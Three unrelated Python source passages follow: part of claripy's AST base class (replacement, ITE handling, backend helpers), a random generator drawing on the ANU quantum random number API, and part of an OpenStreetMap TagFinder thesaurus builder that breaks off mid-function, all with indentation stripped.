The depth of this AST. For example, an AST representing (a+(b+c)) would have a depth of 2.
"""
return self._depth()
def _depth(self, memoized=None):
"""
:param memoized: A dict of ast hashes to depths we've seen before
:return: The depth of the AST. For example, an AST representing (a+(b+c)) would have a depth of 2.
"""
if memoized is None:
memoized = dict()
ast_args = [ a for a in self.args if isinstance(a, Base) ]
max_depth = 0
for a in ast_args:
if a.cache_key not in memoized:
memoized[a.cache_key] = a._depth(memoized)
max_depth = max(memoized[a.cache_key], max_depth)
return 1 + max_depth
@property
def recursive_children_asts(self):
for a in self.args:
if isinstance(a, Base):
l.debug("Yielding AST %s with hash %s with %d children", a, hash(a), len(a.args))
yield a
for b in a.recursive_children_asts:
yield b
@property
def recursive_leaf_asts(self):
return self._recursive_leaf_asts()
def _recursive_leaf_asts(self, seen=None):
if self.depth == 1:
yield self
return
seen = set() if seen is None else seen
for a in self.args:
if isinstance(a, Base) and not a.cache_key in seen:
seen.add(a.cache_key)
if a.depth == 1:
yield a
else:
for b in a.recursive_leaf_asts:
yield b
def dbg_is_looped(self, seen=None, checked=None):
seen = set() if seen is None else seen
checked = set() if checked is None else checked
l.debug("Checking AST with hash %s for looping", hash(self))
if hash(self) in seen:
return self
elif hash(self) in checked:
return False
else:
seen.add(hash(self))
for a in self.args:
if not isinstance(a, Base):
continue
r = a.dbg_is_looped(seen=set(seen), checked=checked)
if r is not False:
return r
checked.add(hash(self))
return False
#
# Various AST modifications (replacements)
#
def _replace(self, replacements, variable_set=None, leaf_operation=None):
"""
A helper for replace().
:param variable_set: For optimization, ast's without these variables are not checked for replacing.
:param replacements: A dictionary of hashes to their replacements.
"""
try:
if variable_set is None:
variable_set = set()
hash_key = self.cache_key
if hash_key in replacements:
r = replacements[hash_key]
elif not self.variables.issuperset(variable_set):
r = self
elif leaf_operation is not None and self.op in operations.leaf_operations:
r = leaf_operation(self)
if r is not self:
replacements[hash_key] = r
return r
else:
new_args = [ ]
replaced = False
for a in self.args:
if isinstance(a, Base):
new_a = a._replace(replacements=replacements, variable_set=variable_set, leaf_operation=leaf_operation)
replaced |= new_a is not a
else:
new_a = a
new_args.append(new_a)
if replaced:
r = self.make_like(self.op, tuple(new_args))
replacements[hash_key] = r
else:
r = self
return r
except ClaripyReplacementError:
l.error("Replacement error:", exc_info=True)
return self
def swap_args(self, new_args, new_length=None):
"""
This returns the same AST, with the arguments swapped out for new_args.
"""
if len(self.args) == len(new_args) and all(a is b for a,b in zip(self.args, new_args)):
return self
#symbolic = any(a.symbolic for a in new_args if isinstance(a, Base))
#variables = frozenset.union(frozenset(), *(a.variables for a in new_args if isinstance(a, Base)))
length = self.length if new_length is None else new_length
a = self.__class__(self.op, new_args, length=length)
#if a.op != self.op or a.symbolic != self.symbolic or a.variables != self.variables:
# raise ClaripyOperationError("major bug in swap_args()")
return a
#
# Other helper functions
#
def split(self, split_on):
"""
Splits the AST if its operation is `split_on` (i.e., return all the arguments). Otherwise, return a list with
just the AST.
"""
if self.op in split_on: return list(self.args)
else: return [ self ]
# we don't support iterating over Base objects
def __iter__(self):
"""
This prevents people from iterating over ASTs.
"""
raise ClaripyOperationError("Please don't iterate over, or split, AST nodes!")
def __nonzero__(self):
"""
This prevents people from accidentally using an AST as a condition. For
example, the following was previously common::
a,b = two ASTs
if a == b:
do something
The problem is that `a == b` would return an AST, because an AST can be symbolic
and there could be no way to actually know the value of that without a
constraint solve. This caused tons of issues.
"""
raise ClaripyOperationError('testing Expressions for truthiness does not do what you want, as these expressions can be symbolic')
def structurally_match(self, o):
"""
Structurally compares two A objects, and check if their corresponding leaves are definitely the same A object
(name-wise or hash-identity wise).
:param o: the other claripy A object
:return: True/False
"""
# TODO: Convert a and b into canonical forms
if self.op != o.op:
return False
if len(self.args) != len(o.args):
return False
for arg_a, arg_b in zip(self.args, o.args):
if not isinstance(arg_a, Base):
if type(arg_a) != type(arg_b):
return False
# They are not ASTs
if arg_a != arg_b:
return False
else:
continue
if arg_a.op in ('I', 'BVS', 'FP'):
# This is a leaf node in AST tree
if arg_a is not arg_b:
return False
else:
if not arg_a.structurally_match(arg_b):
return False
return True
def replace(self, old, new):
"""
Returns an AST with all instances of the AST 'old' replaced with AST 'new'.
"""
self._check_replaceability(old, new)
replacements = {old.cache_key: new}
return self._replace(replacements, variable_set=old.variables)
def replace_dict(self, replacements):
"""
:param replacements: A dictionary of asts to replace and their replacements.
:return: An AST with all instances of ast's in replacements.
"""
#for old, new in replacements.items():
# old = old.ast
# if not isinstance(old, Base) or not isinstance(new, Base):
# raise ClaripyOperationError('replacements must be AST nodes')
# if type(old) is not type(new):
# raise ClaripyOperationError('cannot replace type %s ast with type %s ast' % (type(old), type(new)))
# old._check_replaceability(new)
return self._replace(replacements, variable_set=set())
@staticmethod
def _check_replaceability(old, new):
if not isinstance(old, Base) or not isinstance(new, Base):
raise ClaripyReplacementError('replacements must be AST nodes')
if type(old) is not type(new):
raise ClaripyReplacementError('cannot replace type %s ast with type %s ast' % (type(old), type(new)))
def _identify_vars(self, all_vars, counter):
if self.op == 'BVS':
if self.args not in all_vars:
all_vars[self.args] = BV('BVS', self.args, length=self.length, explicit_name=True)
elif self.op == 'BoolS':
if self.args not in all_vars:
all_vars[self.args] = BoolS('var_' + str(next(counter)))
else:
for arg in self.args:
if isinstance(arg, Base):
arg._identify_vars(all_vars, counter)
def canonicalize(self, var_map=None, counter=None):
counter = itertools.count() if counter is None else counter
var_map = { } if var_map is None else var_map
for v in self._recursive_leaf_asts():
if v.cache_key not in var_map and v.op in { 'BVS', 'BoolS', 'FPs' }:
new_name = 'canonical_%d' % next(counter)
var_map[v.cache_key] = v._rename(new_name)
return var_map, counter, self.replace_dict(var_map)
#
# This code handles burrowing ITEs deeper into the ast and excavating
# them to shallower levels.
#
def _burrow_ite(self):
if self.op != 'If':
#print "i'm not an if"
return self.swap_args([ (a.ite_burrowed if isinstance(a, Base) else a) for a in self.args ])
if not all(isinstance(a, Base) for a in self.args):
#print "not all my args are bases"
return self
old_true = self.args[1]
old_false = self.args[2]
if old_true.op != old_false.op or len(old_true.args) != len(old_false.args):
return self
if old_true.op == 'If':
# let's no go into this right now
return self
if any(a.op in {'BVS', 'BVV', 'FPS', 'FPV', 'BoolS', 'BoolV'} for a in self.args):
# burrowing through these is pretty funny
return self
matches = [ old_true.args[i] is old_false.args[i] for i in range(len(old_true.args)) ]
if matches.count(True) != 1 or all(matches):
# TODO: handle multiple differences for multi-arg ast nodes
#print "wrong number of matches:",matches,old_true,old_false
return self
different_idx = matches.index(False)
inner_if = If(self.args[0], old_true.args[different_idx], old_false.args[different_idx])
new_args = list(old_true.args)
new_args[different_idx] = inner_if.ite_burrowed
#print "replaced the",different_idx,"arg:",new_args
return old_true.__class__(old_true.op, new_args, length=self.length)
def _excavate_ite(self):
if self.op in { 'BVS', 'I', 'BVV' }:
return self
excavated_args = [ (a.ite_excavated if isinstance(a, Base) else a) for a in self.args ]
ite_args = [ isinstance(a, Base) and a.op == 'If' for a in excavated_args ]
if self.op == 'If':
# if we are an If, call the If handler so that we can take advantage of its simplifiers
return If(*excavated_args)
elif ite_args.count(True) == 0:
# if there are no ifs that came to the surface, there's nothing more to do
return self.swap_args(excavated_args)
else:
# this gets called when we're *not* in an If, but there are Ifs in the args.
# it pulls those Ifs out to the surface.
cond = excavated_args[ite_args.index(True)].args[0]
new_true_args = [ ]
new_false_args = [ ]
for a in excavated_args:
#print "OC", cond.dbg_repr()
#print "NC", Not(cond).dbg_repr()
if not isinstance(a, Base) or a.op != 'If':
new_true_args.append(a)
new_false_args.append(a)
elif a.args[0] is cond:
#print "AC", a.args[0].dbg_repr()
new_true_args.append(a.args[1])
new_false_args.append(a.args[2])
elif a.args[0] is Not(cond):
#print "AN", a.args[0].dbg_repr()
new_true_args.append(a.args[2])
new_false_args.append(a.args[1])
else:
#print "AB", a.args[0].dbg_repr()
# weird conditions -- giving up!
return self.swap_args(excavated_args)
return If(cond, self.swap_args(new_true_args), self.swap_args(new_false_args))
@property
def ite_burrowed(self):
"""
Returns an equivalent AST that "burrows" the ITE expressions as deep as possible into the ast, for simpler
printing.
"""
if self._burrowed is None:
self._burrowed = self._burrow_ite() #pylint:disable=attribute-defined-outside-init
self._burrowed._burrowed = self._burrowed
return self._burrowed
@property
def ite_excavated(self):
"""
Returns an equivalent AST that "excavates" the ITE expressions out as far as possible toward the root of the
AST, for processing in static analyses.
"""
if self._excavated is None:
self._excavated = self._excavate_ite() #pylint:disable=attribute-defined-outside-init
# we set the flag for the children so that we avoid re-excavating during
# VSA backend evaluation (since the backend evaluation recursively works on
# the excavated ASTs)
self._excavated._excavated = self._excavated
return self._excavated
#
# these are convenience operations
#
def _first_backend(self, what):
for b in backends._all_backends:
if b in self._errored:
continue
try: return getattr(b, what)(self)
except BackendError: pass
@property
def singlevalued(self):
return self._first_backend('singlevalued')
@property
def multivalued(self):
return self._first_backend('multivalued')
@property
def cardinality(self):
return self._first_backend('cardinality')
@property
def concrete(self):
return backends.concrete.handles(self)
@property
def uninitialized(self):
"""
Whether this AST comes from an uninitialized dereference or not. It's only used in under-constrained symbolic
execution mode.
:return: True/False/None (unspecified).
"""
#TODO: It should definitely be moved to the proposed Annotation backend.
return self._uninitialized
@property
def uc_alloc_depth(self):
"""
The depth of allocation by lazy-initialization. It's only used in under-constrained symbolic execution mode.
:return: An integer indicating the allocation depth, or None if it's not from lazy-initialization.
"""
# TODO: It should definitely be moved to the proposed Annotation backend.
return self._uc_alloc_depth
#
# Backwards compatibility crap
#
@property
def model(self):
l.critical("DEPRECATION WARNING: do not use AST.model. It is deprecated, no longer does what is expected, and "
"will soon be removed. If you *need* to access the model use AST._model_X where X is the backend "
"that you are interested in.")
print("DEPRECATION WARNING: do not use AST.model. It is deprecated, no longer does what is expected, and will "
"soon be removed. If you *need* to access the model use AST._model_X where X is the backend that you are "
"interested in.")
return self._model_concrete if self._model_concrete is not self else \
self._model_vsa if self._model_vsa is not self else \
self._model_z3 if self._model_z3 is not self else \
self
def __getattr__(self, a):
if not a.startswith('_model_'):
raise AttributeError(a)
model_name = a[7:]
if not hasattr(backends, model_name):
raise AttributeError(a)
try:
return getattr(backends, model_name).convert(self)
except BackendError:
return self
def simplify(e):
if isinstance(e, Base) and e.op == 'I':
return e
s = e._first_backend('simplify')
if s is None:
l.debug("Unable to simplify expression")
return e
else:
# Copy some parameters (that should really go to the Annotation backend)
s._uninitialized = e.uninitialized
s._uc_alloc_depth = e._uc_alloc_depth
s._simplified = Base.FULL_SIMPLIFY
return s
from ..errors import BackendError, ClaripyOperationError, ClaripyRecursionError, ClaripyReplacementError
from .. import operations
from ..backend_object import BackendObject
from ..backend_manager import backends
from ..ast.bool import If, Not, BoolS
from ..ast.bv import BV
| |
#!/usr/bin/env python
" quantumRandom.py "
from math import log as _log, ceil as _ceil, floor as _floor
from random import Random
from urllib import urlencode, quote as urlquote
from urllib2 import Request, urlopen
import sys
bitsPerFloat = sys.float_info.mant_dig
try:
import json
except ImportError:
import simplejson as json
class QuantumRandom(Random):
"""Alternate random number generator using the ANU Quantum
Random Numbers Server as the source.
Requires Internet access."""
_URL = 'https://qrng.anu.edu.au/API/jsonI.php'
_DATATYPES = ['uint8', 'uint16', 'hex16']
_MAXLEN = 1024
_MAXINT = 65536
_generator = None
def _fetch(self, dataType, arrayLength=1, blockSize=1):
"Fetch data from the ANU Quantum Random Numbers JSON API"
if dataType not in self._DATATYPES:
raise ValueException('dataType must be one of %s' % self._DATATYPES)
if arrayLength > self._MAXLEN:
raise ValueException('arrayLength cannot be larger than %d' % self._MAXLEN)
if blockSize > self._MAXLEN:
raise ValueException('blockSize cannot be larger than %d' % self._MAXLEN)
options = dict(type=dataType, length=arrayLength, size=blockSize)
url = 'https://qrng.anu.edu.au/API/jsonI.php?' + urlencode(options)
def object_hook(obj):
if obj.get('type') == 'string':
obj['data'] = [s.encode('ascii') for s in obj['data']]
return obj
data = json.loads(urlopen(url).read(), object_hook=object_hook)
assert data['success'] is True, data
assert data['length'] == arrayLength, data
return data['data']
def cached_generator(self, dataType='uint16', cacheSize=None):
"""Returns numbers from the ANU Quantum Random Numbers Server.
Caches numbers to avoid latency."""
if cacheSize is None:
cacheSize = self._MAXLEN
while 1:
for n in self._fetch(dataType, cacheSize, cacheSize):
yield n
def random(self, generator=None):
return self.getrandbits(bitsPerFloat, generator) * 2**-bitsPerFloat
random.__doc__ = Random.random.__doc__
def getrandbits(self, k, generator=None):
"getrandbits(k) -> x. Generates a long int with k random bits."
if k == 0:
return 0
if generator is None:
if self._generator is None:
self._generator = self.cached_generator()
generator = self._generator
maxlen = self._MAXLEN
if k <= 16*maxlen: # A uint16 fetch supplies enough bits
r = 0
for i in xrange((k + 15) // 16):
r <<= 16
r |= generator.next()
if k%16:
r >>= 16 - (k%16)
return r
else:
fullFetch = 8*maxlen*maxlen
fullBlock = 8*maxlen
remainingBits = k%fullBlock
hexString = ''
if remainingBits:
s = hex(self.getrandbits(remainingBits, generator))
hexString = (s[:-1] if s.endswith('L') else s)
if k >= fullFetch:
hexString += ''.join(''.join(self._fetch('hex16', maxlen, maxlen)) for i in xrange(k // fullFetch))
k %= fullFetch
if k >= fullBlock:
hexString += ''.join(self._fetch('hex16', k // fullBlock, maxlen))
return long(hexString, 16)
def _stub(self, *args, **kwargs):
"Stub method. Not used for a remote random number generator."
return None
seed = _stub
jumpahead = _stub
def _notimplemented(self, *args, **kwargs):
"Method should not be called for a remote random number generator."
raise NotImplementedError('Remote entropy sources do not have state.')
getstate = _notimplemented
setstate = _notimplemented
## -------------------- integer methods -------------------
def randrange(self, start, stop=None, step=1, generator=None):
# This function exactly parallels the code in Random.py,
# so most comments are copied here.
# This code is a bit messy to make it fast for the
# common case while still doing adequate error checking.
istart = int(start)
if istart != start:
raise ValueError('non-integer arg 1 for randrange()')
if stop is None:
if istart > 0:
return self._randbelow(istart, generator)
raise ValueError('empty range for randrange()')
# stop argument supplied.
istop = int(stop)
if istop != stop:
raise ValueError('non-integer stop for randrange()')
width = istop - istart
if step == 1:
if width > 0:
return int(istart + self._randbelow(width, generator))
raise ValueError('empty range for randrange() (%d,%d, %d)' % (istart, istop, width))
# Non-unit step argument supplied.
istep = int(step)
if istep != step:
raise ValueError('non-integer step for randrange()')
if istep > 0:
n = (width + istep - 1) // istep
elif istep < 0:
n = (width + istep + 1) // istep
else:
raise ValueError('zero step for randrange()')
if n <= 0:
raise ValueError('empty range for randrange()')
return int(istart + istep*self._randbelow(n, generator))
randrange.__doc__ = Random.randrange.__doc__
def _randbelow(self, n, generator=None, _log=_log, int=int):
k = int(1.00001 + _log(n-1, 2.0)) # 2**k > n-1 > 2**(k-2)
r = self.getrandbits(k, generator)
while r >= n:
r = self.getrandbits(k, generator)
return r
_randbelow.__doc__ = Random._randbelow.__doc__
## -------------------- sequence methods -------------------
def choice(self, seq, generator=None):
length = len(seq)
if length == 0:
raise IndexError('list index out of range')
return seq[self.randrange(length, generator=generator)]
choice.__doc__ = Random.choice.__doc__
def shuffle(self, x, random=None, generator=None):
if random is not None:
return Random.shuffle(self, x, random)
randrange = self.randrange
for i in reversed(xrange(1, len(x))):
# pick an element in x[:i+1] with which to exchange x[i]
j = randrange(i + 1, generator=generator)
x[i], x[j] = x[j], x[i]
shuffle.__doc__ = Random.shuffle.__doc__
def sample(self, population, k, generator=None):
# This function exactly parallels the code in Random.py.
# Comments are therefore omitted, to save space.
n = len(population)
if not 0 <= k <= n:
raise ValueError('sample larger than population')
randrange = self.randrange
result = [None] * k
setsize = 21
if k > 5:
setsize += 4 ** _ceil(_log(k * 3, 4))
if n <= setsize or hasattr(population, 'keys'):
pool = list(population)
for i in xrange(k):
j = randrange(n-i, generator=generator)
result[i] = pool[j]
pool[j] = pool[n-i-1]
else:
try:
selected = set()
selected_add = selected.add
for i in xrange(k):
j = randrange(n, generator=generator)
while j in selected:
j = randrange(n, generator=generator)
selected_add(j)
result[i] = population[j]
except (TypeError, KeyError):
if isinstance(population, list):
raise
return self.sample(tuple(population), k, generator)
return result
sample.__doc__ = Random.sample.__doc__
if __name__ == '__main__':
print __doc__.strip()
| |
# -*- coding: utf-8 -*-
'''
Created on 27.09.2014
@author: Simon Gwerder
'''
from thesaurus.mapsemnet import MapOSMSemanticNet
from thesaurus.rdfgraph import RDFGraph
from utilities import utils
from utilities.configloader import ConfigLoader
from utilities.translator import Translator
from filter import Filter
class BaseThesaurus:
rdfGraph = RDFGraph()
tagInfo = None
numberKeys = 0
numberTags = 0
cl = ConfigLoader()
osmWikiBase = cl.getThesaurusString('OSM_WIKI_PAGE')
keySchemeName = cl.getThesaurusString('KEY_SCHEME_NAME')
tagSchemeName = cl.getThesaurusString('TAG_SCHEME_NAME')
keySchemeTitle = cl.getThesaurusString('KEY_SCHEME_TITLE')
tagSchemeTitle = cl.getThesaurusString('TAG_SCHEME_TITLE')
creator = cl.getThesaurusString('CREATOR')
outputName = cl.getThesaurusString('OUTPUT_NAME') # tagfinder_thesaurus
outputEnding = cl.getThesaurusString('DEFAULT_FORMAT') # .rdf
translationHintDE = cl.getThesaurusString('TRANSLATION_HINT_DE')
translationHintEN = cl.getThesaurusString('TRANSLATION_HINT_EN')
editNote = cl.getThesaurusString('NO_TERM')
valueMinCount = cl.getThesaurusInt('MINIMUM_COUNT')
filterUtil = Filter()
translator = Translator()
console = None
def __init__(self, tagInfo, rdfGraph=None, console=None):
if tagInfo is None: return
self.tagInfo = tagInfo
if rdfGraph is not None:
self.rdfGraph = rdfGraph
if console is not None:
self.console = console
def createBaseThesaurus(self, console):
if console is not None:
self.console = console
self.printMessage(' Requesting valid OSM keys from "' + self.cl.getTagInfoAPIString('TAGINFO_PAGE') + '":')
keyList = self.getListOfValidKeys()
self.numberKeys = len(keyList) + len(self.filterUtil.exactKeyFilter)
self.printMessage(' Got ' + str(len(keyList)) + ' valid OSM keys. ' + str(len(self.filterUtil.exactKeyFilter)) + ' are additional keys from filter.')
self.printMessage('\n Requesting valid OSM tags from "' + self.cl.getTagInfoAPIString('TAGINFO_PAGE') + '":')
tagMap = self.bundleToTagMap(keyList)
self.numberTags = self.getNumberTags(tagMap)
self.printMessage(' Got ' + str(self.numberTags) + ' valid OSM tags.')
empty = []
for filteredKey in self.filterUtil.exactKeyFilter:
tagMap[filteredKey] = empty
self.printMessage('\n Requesting detailed information from "' + self.cl.getTagInfoAPIString('TAGINFO_PAGE') + '":')
self.createGraph(keyList, tagMap)
self.printMessage('\n Linking OSM "implies", "combines" and "links" relations to graph concepts')
self.osmLinksToConcept()
self.printMessage('\n Create mapping to OSM Semantic Net')
osnSemNetFilePath = utils.semnetDir() + 'osm_semantic_network.rdf'
MapOSMSemanticNet(self.rdfGraph, osnSemNetFilePath)
fullPath = utils.outputFile(utils.tempDir(), self.outputName, self.outputEnding, useDateEnding=True)
name = fullPath[fullPath.rfind('\\') + 1:]
self.printMessage('\n Serializing graph to: ' + name)
self.rdfGraph.serialize(fullPath)
self.printMessage('\n Finished creating TagFinder BaseThesaurus')
def printPercent(self, partInt, totalInt, workingOn=None):
'''Only print percents if according outwriter was defined'''
if self.console is not None:
self.console.printPercent(partInt, totalInt, workingOn)
def printMessage(self, message):
'''Only print message if according outwriter was defined'''
if self.console is not None:
self.console.println(message)
def getNumberTags(self, tagMap):
'''Returns number of tags in 'tagMap'.'''
count = 0
for key in tagMap:
listValues = tagMap[key]
count = count + len(listValues)
return count
def getBaseGraph(self):
'''Getter for the base rdfGraph.'''
return self.rdfGraph
def getListOfValidKeys(self):
'''Calls TagInfo for a list of all keys. The elements in the list are then checked for their validity.
'minCount' is a restriction on the number of occurence of a key and the number of values per key.
The returned list is descending sorted by count of values attached to the key.'''
keyData = self.tagInfo.getAllKeyData()
return self.filterKeyData(keyData)
def filterKeyData(self, keyData):
'''Takes the raw key data from 'keyData' and makes validation checks on each
element. Then a list of valid keys is returned.'''
keyList = []
atPart = 1
for keyItem in keyData:
#if keyItem['count_all'] < self.valueMinCount:
#break # speedup because of sorted list
if not self.filterUtil.hasKey(keyItem['key']) and utils.validCharsCheck(keyItem['key']) and keyItem['values_all'] >= self.valueMinCount:
keyList.append(keyItem['key'])
self.printPercent(partInt=atPart, totalInt=len(keyData), workingOn='Getting key: ' + keyItem['key'])
atPart = atPart + 1
self.printPercent(partInt=1, totalInt=1)
return keyList
def filterTagData(self, key, tagMap, tagData):
'''Takes the raw key data from 'tagData' and makes validation checks on each
element. Then the updated 'tagMap' (k:key, v:value) is returned.'''
for valueItem in tagData:
if not self.filterUtil.hasValue(valueItem['value']) and valueItem['in_wiki'] and utils.validCharsCheck(valueItem['value']) and valueItem['count'] >= self.valueMinCount:
k = tagMap.get(key)
if k is not None:
k.append(valueItem['value'])
else:
k = [valueItem['value']]
tagMap[key] = k
return tagMap
def bundleToTagMap(self, keyList):
'''Creates a hash map with k:key and v:value of valid keys and values.'''
tagMap = {}
atPart = 1
for key in keyList:
self.printPercent(atPart, len(keyList), 'Getting all tags for key: ' + key)
tagData = self.tagInfo.getAllTagData(key)
tagMap = self.filterTagData(key, tagMap, tagData)
atPart = atPart + 1
return tagMap
def addDepictionScopeNote(self, concept, wikiPageJson, new=True):
'''Adds a depiction and scopeNote in EN and DE to the 'concept' (if available,
also translates to the other language if only one is).'''
scopeNoteDE = ''
scopeNoteEN = ''
depiction = ''
for wikiData in wikiPageJson['data']:
if wikiData['lang'] == 'de':
temp = wikiData['description']
if temp is not None and not temp == '':
temp = temp.replace('\'', '')
temp = temp.replace('[[w:','')
temp = temp.replace('[[w', '')
temp = temp.replace('[[de:','')
temp = temp.replace('[[en:','')
temp = temp.replace('en=','')
temp = temp.replace('[[wikipedia:de:', '')
temp = temp.replace('[[wikipedia:en:', '')
temp = temp.replace('[[wikipedia:','')
temp = temp.replace('[[Wikipedia:','')
temp = temp.replace('[[wiktionary:de:', '')
temp = temp.replace('[[wiktionary:en:', '')
temp = temp.replace('[[Wiktionary:','')
temp = temp.replace('[[wiktionary:','')
temp = temp.replace('[[','')
temp = temp.replace(']]', '')
scopeNoteDE = temp
elif wikiData['lang'] == 'en':
temp = wikiData['description']
if temp is not None and not temp == '':
temp = temp.replace('\'', '')
scopeNoteEN = temp
imageData = wikiData['image']
depiction = imageData['image_url']
if depiction is None or depiction == '':
imageData = wikiData['image']
depiction = imageData['image_url']
if scopeNoteDE == '' and not scopeNoteEN == '':
if new:
self.rdfGraph.addScopeNote(concept, scopeNoteEN, 'en')
self.rdfGraph.addScopeNote(concept, self.translator.translateENtoDE(scopeNoteEN) + ' ' + self.translationHintDE, 'de')
else:
self.rdfGraph.setScopeNote(concept, scopeNoteEN, 'en')
self.rdfGraph.addScopeNote(concept, self.translator.translateENtoDE(scopeNoteEN) + ' ' + self.translationHintDE, 'de')
elif not scopeNoteDE == '' and scopeNoteEN == '':
if new:
self.rdfGraph.addScopeNote(concept, self.translator.translateDEtoEN(scopeNoteDE) + ' ' + self.translationHintEN, 'en')
self.rdfGraph.addScopeNote(concept, scopeNoteDE, 'de')
else:
self.rdfGraph.setScopeNote(concept, self.translator.translateDEtoEN(scopeNoteDE) + ' ' + self.translationHintEN, 'en')
self.rdfGraph.addScopeNote(concept, scopeNoteDE, 'de')
elif not scopeNoteDE == '' and not scopeNoteEN == '':
if new:
self.rdfGraph.addScopeNote(concept, scopeNoteEN, 'en')
self.rdfGraph.addScopeNote(concept, scopeNoteDE, 'de')
else:
self.rdfGraph.setScopeNote(concept, scopeNoteEN, 'en')
self.rdfGraph.addScopeNote(concept, scopeNoteDE, 'de')
if depiction is not None and not depiction == '' and new:
self.rdfGraph.addDepiction(concept, depiction)
if depiction is not None and not depiction == '' and not new:
self.rdfGraph.setDepiction(concept, depiction)
def updateTagStats(self, concept, key, value=None, wikiPageJson=None, new=True):
'''Updates stats counts, node use, way use, area use and relation use.'''
tagInfoStats = self.tagInfo.getTagInfoStats(key=key, value=value, wikiPageJson=wikiPageJson)
nodeStr = '{ "count": "0", "use": "False" }' # dummy values
wayStr = '{ "count": "0", "use": "False" }'
areaStr = '{ "count": "0", "use": "False" }'
relationStr = '{ "count": "0", "use": "False" }'
if value is None:
nodeStr = '{ "count": "' + str(tagInfoStats.getCountNodes()) + '", "use": "False" }'
wayStr = '{ "count": "' + str(tagInfoStats.getCountWays()) + '", "use": "False" }'
areaStr = '{ "count": "0", "use": "False" }'
relationStr = '{ "count": "' + str(tagInfoStats.getCountRelations()) + '", "use": "False" }'
else:
onNode = tagInfoStats.getOnNode()
onWay = tagInfoStats.getOnWay()
onRelation = tagInfoStats.getOnRelation()
#if not onNode and not onWay and not onRelation:
# onArea = True
#else:
# onArea = tagInfoStats.getOnArea()
onArea = tagInfoStats.getOnArea()
nodeStr = '{ "count": "' + str(tagInfoStats.getCountNodes()) + '", "use": "' + str(onNode) + '" }'
wayStr = '{ "count": "' + str(tagInfoStats.getCountWays()) + '", "use": "' + str(onWay) + '" }'
areaStr = '{ "count": "0"' + ', "use": "' + str(onArea) + '" }'
relationStr = '{ "count": "' + str(tagInfoStats.getCountRelations()) + '", "use": "' + str(onRelation) + '" }'
if new:
self.rdfGraph.addOSMNode(concept, nodeStr)
self.rdfGraph.addOSMWay(concept, wayStr)
self.rdfGraph.addOSMArea(concept, areaStr)
self.rdfGraph.addOSMRelation(concept, relationStr)
else:
self.rdfGraph.setOSMNode(concept, nodeStr)
self.rdfGraph.setOSMWay(concept, wayStr)
self.rdfGraph.setOSMArea(concept, areaStr)
self.rdfGraph.setOSMRelation(concept, relationStr)
def deleteAllLinks(self, concept):
'''Deletes all link for 'concept', UriRefs and Literals.'''
self.rdfGraph.setOSMImpliesUriRef(concept, 'dummy')
self.rdfGraph.setOSMCombinesUriRef(concept, 'dummy')
self.rdfGraph.setOSMLinksUriRef(concept, 'dummy')
self.rdfGraph.setOSMImpliesLiteral(concept, 'dummy')
self.rdfGraph.setOSMCombinesLiteral(concept, 'dummy')
self.rdfGraph.setOSMLinksLiteral(concept, 'dummy')
self.rdfGraph.removeOSMImpliesUriRef(concept, 'dummy')
self.rdfGraph.removeOSMCombinesUriRef(concept, 'dummy')
self.rdfGraph.removeOSMLinksUriRef(concept, 'dummy')
self.rdfGraph.removeOSMImpliesLiteral(concept, 'dummy')
self.rdfGraph.removeOSMCombinesLiteral(concept, 'dummy')
self.rdfGraph.removeOSMLinksLiteral(concept, 'dummy')
def updateTagLinks(self, concept, key, value=None, wikiPageJson=None, new=True):
'''Updates the tag links from OSM wiki: implies, combinations and linked. Just as Literals.'''
tagInfoUpdate = self.tagInfo.getTagInfoStats(key=key, value=value, wikiPageJson=wikiPageJson)
listImplies = tagInfoUpdate.getListImplies()
listCombinations = tagInfoUpdate.getListCombinations()
listLinked = tagInfoUpdate.getListLinked()
if not new:
self.deleteAllLinks(concept)
impliesStr = '\t\tImplies: '
for tagImplies in listImplies: #tags or keys
self.rdfGraph.addOSMImpliesLiteral(concept, tagImplies)
impliesStr = impliesStr + tagImplies + ', '
combinesStr = '\t\tCombines: '
for tagCombines in listCombinations: #tags or keys
self.rdfGraph.addOSMCombinesLiteral(concept, tagCombines)
combinesStr = combinesStr + tagCombines + ', '
linksStr = '\t\tLinks: '
for tagLinks in listLinked: #tags or keys
self.rdfGraph.addOSMLinksLiteral(concept, tagLinks)
linksStr = linksStr + tagLinks + ', '
def createKey(self, key, keyScheme):
'''Adds key with name 'key' to the rdfGraph, with as much wiki information as possible.'''
keyConcept = self.rdfGraph.addConcept(self.osmWikiBase + 'Key:' + key)
self.rdfGraph.addInScheme(keyConcept, keyScheme)
self.rdfGraph.addPrefLabel(keyConcept, key)
# rdfGraph.addHasTopConcept(keyScheme, keyConcept)
keyWikiPageJson = self.tagInfo.getWikiPageOfKey(key)
if len(keyWikiPageJson) > 0:
self.updateTagStats(concept=keyConcept, key=key, wikiPageJson=keyWikiPageJson)
self.updateTagLinks(concept=keyConcept, key=key, wikiPageJson=keyWikiPageJson)
self.addDepictionScopeNote(keyConcept, keyWikiPageJson)
self.rdfGraph.addEditorialNote(keyConcept, self.editNote)
return keyConcept
def createTag(self, key, keyConcept, value, tagScheme):
'''Adds value with name 'key'='value' to the rdfGraph, with as much wiki information as possible.'''
taglink = self.osmWikiBase + 'Tag:' + key + '=' + value # before: key + '%3D' + value
# result = requests.get('http://' + taglink)
tagWikiPageJson = self.tagInfo.getWikiPageOfTag(key, value)
if len(tagWikiPageJson) > 0:
tagConcept = self.rdfGraph.addConcept(taglink)
self.rdfGraph.addInScheme(tagConcept, tagScheme)
self.rdfGraph.addPrefLabel(tagConcept, key + '=' + value)
self.rdfGraph.addBroader(tagConcept, keyConcept)
self.rdfGraph.addNarrower(keyConcept, tagConcept)
self.updateTagStats(concept=tagConcept, key=key, value=value, wikiPageJson=tagWikiPageJson)
self.updateTagLinks(concept=tagConcept, key=key, value=value, wikiPageJson=tagWikiPageJson)
self.addDepictionScopeNote(tagConcept, tagWikiPageJson)
self.rdfGraph.addEditorialNote(tagConcept, self.editNote)
return tagConcept
def createGraph(self, keyList, tagMap):
'''Fills rdfGraph with keys and tags.'''
keyScheme = self.rdfGraph.addConceptScheme(self.keySchemeName, self.keySchemeTitle, self.creator)
tagScheme = self.rdfGraph.addConceptScheme(self.tagSchemeName, self.tagSchemeTitle, self.creator)
totalParts = self.numberKeys + self.numberTags
atPart = 1
for filteredKey in self.filterUtil.exactKeyFilter:
self.console.printPercent(partInt=atPart, totalInt=totalParts, workingOn='Key: ' + filteredKey)
keyConcept = self.createKey(filteredKey, keyScheme)
atPart = atPart + 1
for key in keyList:
self.printPercent(partInt=atPart, totalInt=totalParts, workingOn='Key: ' + key)
keyConcept = self.createKey(key, keyScheme)
atPart = atPart + 1
valueList = tagMap.get(key)
if valueList is None or len(valueList) == 0:
